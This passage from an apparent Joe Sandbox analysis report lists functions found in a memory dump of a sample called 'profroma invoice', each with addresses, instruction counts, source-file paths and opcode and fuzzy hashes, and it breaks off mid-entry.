                                                          • Opcode ID: 954c02d474f10d2ed02cca660ed3cc9af5ec203f0f101cec44a491e4f30fb0c2
                                                          • Instruction ID: 7279c3148844472d2515d42ada9479fe2bf873a2ab00441392b9c8ef8424d6d8
                                                          • Opcode Fuzzy Hash: 954c02d474f10d2ed02cca660ed3cc9af5ec203f0f101cec44a491e4f30fb0c2
                                                          • Instruction Fuzzy Hash: 1BA1BC72A042129FC721DF18C984B6BFBE9FF48714F15096CE6869B756D334E901CB91
                                                          Function 017F2B57 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction ID: 983883864fa0d9b2c8fc550bc1d2915554e315b70810915df305889f4213b6cc
                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction Fuzzy Hash: 75B11A71E0061ADFDB19CFA9C880AAEFBB5FF48310F148169EA15A7356D730E941CB94
                                                          Function 017A60E0 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bf9d0b7cd024688c99de58f15d88da3fcddf8f87171fc4791659d6e5613a378
                                                          • Instruction ID: b5e7b84019ce338960b60bec5f85cd23cc05fa70a8fbd7ac8b4c1d42ee910d87
                                                          • Opcode Fuzzy Hash: 8bf9d0b7cd024688c99de58f15d88da3fcddf8f87171fc4791659d6e5613a378
                                                          • Instruction Fuzzy Hash: 0E91C271D00216AFDB15CFA8D894BAEFFB5AF88710F594269F610EB341D734E9019BA0
                                                          Function 0173E3F0 Relevance: .3, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05880d1db63d4cac4cbf4aea3e690056b97b7adea2a74b5ac866410241a92fd5
                                                          • Instruction ID: 1f408eb1742e668f50a86b955493343fc85211ab2aa520e0199596286f7d0cb8
                                                          • Opcode Fuzzy Hash: 05880d1db63d4cac4cbf4aea3e690056b97b7adea2a74b5ac866410241a92fd5
                                                          • Instruction Fuzzy Hash: 2E913532A00216DBEB24EB58C884B79FBA1EFD4714F2540A5EA45DB386FA34D941CB51
                                                          Function 01776ACC Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2865e10e10b60524e6f7beb7f5fbeb003391d1ddc5b25335a7f100b0fa67dcd0
                                                          • Instruction ID: 942f6c03b2b29fd27ac77865360f989e3382d32422042efb37c2430f7e1f1386
                                                          • Opcode Fuzzy Hash: 2865e10e10b60524e6f7beb7f5fbeb003391d1ddc5b25335a7f100b0fa67dcd0
                                                          • Instruction Fuzzy Hash: AE818271A006169BEF24CF69C940ABEFBF9FB48700F14852EE555E7645E334E940CBA4
                                                          Function 017EAB40 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction ID: 1c79033b699f32c3a3a3e399c38cf9041d190b9034f5749619e294261570adc9
                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction Fuzzy Hash: E1819231A0020A9FDF19CF98C898AAEFBF2FF88310F188569D9169B355D774E951CB50
                                                          Function 0175E284 Relevance: .2, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4037a0cc4d87648b691c698f33837fb9cb10dfbb2934fb8da1b66f70c71ed8b9
                                                          • Instruction ID: 6a68e2faaedcf7262ddfd1bedae27d4e0cbbfe2e3c02ba15601097efab4a3c8b
                                                          • Opcode Fuzzy Hash: 4037a0cc4d87648b691c698f33837fb9cb10dfbb2934fb8da1b66f70c71ed8b9
                                                          • Instruction Fuzzy Hash: 83818D71A00609AFDB61CFA9C880AEEFBBAFF48344F10442DE955A7211DB70AD45CB60
                                                          Function 0173C640 Relevance: .2, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a45107bc3dda72818cef6e3007c8c11b6ee48c7ab3085248cc6ab08955491b7
                                                          • Instruction ID: f90aed4c48121f91f7fdf17c619cb5c1f89a05c277d91e85f1e943f316984e90
                                                          • Opcode Fuzzy Hash: 0a45107bc3dda72818cef6e3007c8c11b6ee48c7ab3085248cc6ab08955491b7
                                                          • Instruction Fuzzy Hash: 5C71DCB5C00229DBCB269F58C8907BEFBB5FF98710F14415AE942AB351E3309940CBA0
                                                          Function 017D47A0 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d57c57ad086b436c519be7d57d252c946d2896a96a573c770c3f4164537dab6e
                                                          • Instruction ID: a5f368aa1bfa2b75356dbcb93521d5be487d48a64e97c7090234dfc637494d4c
                                                          • Opcode Fuzzy Hash: d57c57ad086b436c519be7d57d252c946d2896a96a573c770c3f4164537dab6e
                                                          • Instruction Fuzzy Hash: E571BF71900209EFDB20CF99D944A9AFBFCFF91300F25415AE641AB658E7B28B40CF15
                                                          Function 0173260B Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aee563ace5e70f639cb2f6206e26ad66452c15be15b649ebb26533c465a5d45d
                                                          • Instruction ID: 64ede4a9d43e2c4c8776c463e272a76c20d326c42b2b838322e17cb93ac57d37
                                                          • Opcode Fuzzy Hash: aee563ace5e70f639cb2f6206e26ad66452c15be15b649ebb26533c465a5d45d
                                                          • Instruction Fuzzy Hash: 3471CB716042429FD322DF28C484B2AF7E5FFC8310F0485AAE8998B757DB34D846CB91
                                                          Function 017A035C Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction ID: 6f4bbc57ea997b1863daee93beaf833129e25b322963f7ded4e9d45393651f05
                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction Fuzzy Hash: E7716D71A00609EFDB10DFA9C988EAEFBB9FF88300F504569E505E7294DB34EA01CB50
                                                          Function 017B62A0 Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fd36b5b4cfb346f182f0cba83590ef26ce3fad43fef2cf8747a478ca33de56d
                                                          • Instruction ID: 86fe31cfec967561c788cd64a30b2772b6cd353945bb4fa03daf1c7a7bd32748
                                                          • Opcode Fuzzy Hash: 5fd36b5b4cfb346f182f0cba83590ef26ce3fad43fef2cf8747a478ca33de56d
                                                          • Instruction Fuzzy Hash: AF71E332200B01AFE7329F18C888F96FBA6EF44720F144828F7558B2A1D779E944CB50
                                                          Function 01728AA0 Relevance: .2, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c67eccdd8e8daba4226b04c28e0933677d7227683046c9883cd7bc2cddc61e8b
                                                          • Instruction ID: 8e24ce1bdf70f57ca1710e88f33c1a267ccbef19d2a1b6e68b7812b41f6ed299
                                                          • Opcode Fuzzy Hash: c67eccdd8e8daba4226b04c28e0933677d7227683046c9883cd7bc2cddc61e8b
                                                          • Instruction Fuzzy Hash: 9981AC72A083168FDB24DF98D488BADF7F5BB48311F16416DD900AB386C7759E41CB94
                                                          Function 017F8324 Relevance: .2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 616b770dacc7a4f25bd2d30a203f8702eae16c024f4da2aa25c4ab9019c4ede9
                                                          • Instruction ID: 430ce037311a0263942b2d584f864c4a0fce44390ef386e6b4cf8b54b240a585
                                                          • Opcode Fuzzy Hash: 616b770dacc7a4f25bd2d30a203f8702eae16c024f4da2aa25c4ab9019c4ede9
                                                          • Instruction Fuzzy Hash: D2710871E00209AFDF16DF94C845FEFFBB9EF04350F104169AA24AB294E774AA45CB91
                                                          Function 017DA250 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d99ba5b3f8dffae93d65bbc9c83c1bc1ccb726b28a161e63dc642b0c9c5b09c3
                                                          • Instruction ID: 7e7c760fdc4e933b71ab2591a69475b0fa67ec84c26463296f49fa3c24cfd983
                                                          • Opcode Fuzzy Hash: d99ba5b3f8dffae93d65bbc9c83c1bc1ccb726b28a161e63dc642b0c9c5b09c3
                                                          • Instruction Fuzzy Hash: F451AC72504616AFD722DA68C848E5BFBF8FBC5750F000929BA41DB250D774ED048BA2
                                                          Function 017C8350 Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 123cd114ba3f6eb79a9d25d7bdb57df7564c05ebcbb6c161817b5c501c7048c4
                                                          • Instruction ID: 659701a041c4fc8b4ed06b0998c71ce3080bb917d4d7dcc17d3356028542e09d
                                                          • Opcode Fuzzy Hash: 123cd114ba3f6eb79a9d25d7bdb57df7564c05ebcbb6c161817b5c501c7048c4
                                                          • Instruction Fuzzy Hash: 3851CF70900705DFD731CF6AC884AABFBF8BF94B10F10461ED296976A1D7B0A645CB91
                                                          Function 0175E443 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6295ad4404ec2931795d474fd11c325c6f62e1397e7379f4b856c76c508a10f5
                                                          • Instruction ID: f1aedb5d03edd368fa0c344efb1790a67cb295b6a1dc0f36f655430255acd864
                                                          • Opcode Fuzzy Hash: 6295ad4404ec2931795d474fd11c325c6f62e1397e7379f4b856c76c508a10f5
                                                          • Instruction Fuzzy Hash: F8518971200A05DFDB62EF69C984EAAF7BDFF54784F400869EA1197261EB34EA44CB50
                                                          Function 017C4180 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 129d25f6da89bbc579a4f78f1783a2280a7b17eff042c23e3a10d3cd0ad505fc
                                                          • Instruction ID: 5b907bebf3eb046c3dbbf77a3882c47f6d415d32169f9e603bd4f2ed638b6215
                                                          • Opcode Fuzzy Hash: 129d25f6da89bbc579a4f78f1783a2280a7b17eff042c23e3a10d3cd0ad505fc
                                                          • Instruction Fuzzy Hash: 2E5156716083029FD754DF29C891A6BFBE5BFC8B18F44492DF98AD7250EB30D9058B52
                                                          Function 017445B1 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction ID: 3820a1da5b28e989bf860933814d1ae4e63b0c10e69c4cbe97c6e8f4513065fe
                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction Fuzzy Hash: DD519F71E0021AABDF16DF98C444BFEFBB9AF49754F044069EA02AB240D734DE45DBA0
                                                          Function 017AE9E0 Relevance: .2, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction ID: ac6d2eeafeefa50533a42e5977d16edea71d1bcf87e6ae1030769156fbc49461
                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction Fuzzy Hash: F9519671D0021AEFEF219B94C898FAEFB79AF80364F554765E91267190DB309E408BA0
                                                          Function 017E8B28 Relevance: .2, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db00a338fde8402787964195fddf6ffcb28add4f1589bcf391a8eb26641e309d
                                                          • Instruction ID: 932794fc67d18cea46b01bfb3ab67f1986645c212215795d717ef76d4cbe5040
                                                          • Opcode Fuzzy Hash: db00a338fde8402787964195fddf6ffcb28add4f1589bcf391a8eb26641e309d
                                                          • Instruction Fuzzy Hash: A34125707016019BDB29DB2DC98CB3BFBDAEF89220F088659E9158B394DB30D811C692
                                                          Function 017ACBF0 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c650c3f2f4b8e9246ef3331c289eba3ff56bb57fb52e42a10b6843aef1a675
                                                          • Instruction ID: 6896321c3f81ba5daa52d8fad44db2d99849c83a4b2b855e212a948312ba62ca
                                                          • Opcode Fuzzy Hash: a8c650c3f2f4b8e9246ef3331c289eba3ff56bb57fb52e42a10b6843aef1a675
                                                          • Instruction Fuzzy Hash: C9518D72900216EFCB21DFA9C9849AEFBF9FF88214BA04659D545A7309D770AE41CFD0
                                                          Function 0175A430 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50167faf002292634da9913cd8c245a8e0f50d54b19e0c672b6098b9f3f105d1
                                                          • Instruction ID: 51f12596245535a2ec74774854576570c018d29e357a1130d97d1eff5b355896
                                                          • Opcode Fuzzy Hash: 50167faf002292634da9913cd8c245a8e0f50d54b19e0c672b6098b9f3f105d1
                                                          • Instruction Fuzzy Hash: 4A412A72E003029BDF65EF69A895FAAF768EB58708F00017CFD169B245D7F19A00CB90
                                                          Function 017EA9D3 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction ID: 1df99fbdb7486ae86913550185994b8ecf984a3d15bb95d2e9e4e9d995a98567
                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction Fuzzy Hash: 5B412D71A007069FCB25CF28C888A6BF7E9FF88210B05466DE91287645EB30FE14C7D0
                                                          Function 017501F8 Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b78377f977a9d48aaab0a78129f8063ffd255bc7ca5554de6b2d58da3af77ed
                                                          • Instruction ID: c960f0d32ce83a57d76ab66f097992065e5fc7b321d3356d3572ce272b1bb86a
                                                          • Opcode Fuzzy Hash: 5b78377f977a9d48aaab0a78129f8063ffd255bc7ca5554de6b2d58da3af77ed
                                                          • Instruction Fuzzy Hash: 54418736A002199BDB54DF98C440AEEFBB4BF48710F14816EFD15AB341E7B59D41CBA4
                                                          Function 0174EBFC Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbb8eeecbd7929612060d613afa3c857215c0a1060c887428f26db6a29d53ac1
                                                          • Instruction ID: 1f78ffb8882b396c5f275a042e9b1e65e4e550475a00146905971f843301fdcf
                                                          • Opcode Fuzzy Hash: cbb8eeecbd7929612060d613afa3c857215c0a1060c887428f26db6a29d53ac1
                                                          • Instruction Fuzzy Hash: 6D41E6726043019FD721EF28C884A2BF7E9FF88224F104869E597C7356EB34E8848B54
                                                          Function 01762750 Relevance: .1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction ID: abcccb145c8f5796743e0dcd8e2f62e2b7a559093b7a1861d1974bd0d095fb17
                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction Fuzzy Hash: 5A517A75A01619CFCB15CF9DC480AAEF7B2FF84710F2881A9D915AB351D730AE86CB90
                                                          Function 01726154 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 54cdb137fd1da61f7086e91762bc8521a3278dba42ba4f4fec6f4a4474da85eb
                                                          • Instruction ID: 24498ab5f7a40e449c6405bb27eeb39a5611cbe770d2d1e690b0aefcbcb6946d
                                                          • Opcode Fuzzy Hash: 54cdb137fd1da61f7086e91762bc8521a3278dba42ba4f4fec6f4a4474da85eb
                                                          • Instruction Fuzzy Hash: 4C513971944226DBDB25DB28CC04BE8FBB5FF15304F1442E6E929972C6E7749982CF80
                                                          Function 01720BCD Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32f64544cd46a171d8acdc4e77b81aec54228b480b2cc025bfe09739cfae362f
                                                          • Instruction ID: 24d9aa149488f5b624fd5112c73292f7b70db8f8e7f44c41e76e59a669a18b95
                                                          • Opcode Fuzzy Hash: 32f64544cd46a171d8acdc4e77b81aec54228b480b2cc025bfe09739cfae362f
                                                          • Instruction Fuzzy Hash: 9C418175A002299BDF21DF68C944BEAF7B8AF49740F0100E5E909AB241DB749E81CFA1
                                                          Function 017E866E Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction ID: 6ba6deed1fc95d9e7b1a7d9c945859dcb169b4e877bb1a09aa972936fcbf7790
                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction Fuzzy Hash: F2418675B10105ABDB15DF99CC88AAFFBFAAF8C714F1440A9E904A7346DA70DD01CB61
                                                          Function 01720887 Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 98eacc5a5fabc49f0b0815114b63629f388536ad016d9390bed1615b6cc58f4a
                                                          • Instruction ID: 12f32f77ba5321fa813aec699e4f2fc029480b845d09f4eeaa6f7a864ba981f0
                                                          • Opcode Fuzzy Hash: 98eacc5a5fabc49f0b0815114b63629f388536ad016d9390bed1615b6cc58f4a
                                                          • Instruction Fuzzy Hash: A241A0B17007129FE725CF28C484A26F7F9FF89314B144AADE58787A51E770E946CBA0
                                                          Function 0174A470 Relevance: .1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df6c5acf11cd2525add458959051b8a96b5d4665354056d180e125e05b1e063e
                                                          • Instruction ID: 01a0ace3f7445ca3f454698293121537f74e818cf663fa41b926098a4c35e7ec
                                                          • Opcode Fuzzy Hash: df6c5acf11cd2525add458959051b8a96b5d4665354056d180e125e05b1e063e
                                                          • Instruction Fuzzy Hash: 35419F32A80205CFDB25DF6CD5947ADFBB4BB58310F1801A5D412BB395DB349A40CFA0
                                                          Function 01728BF0 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
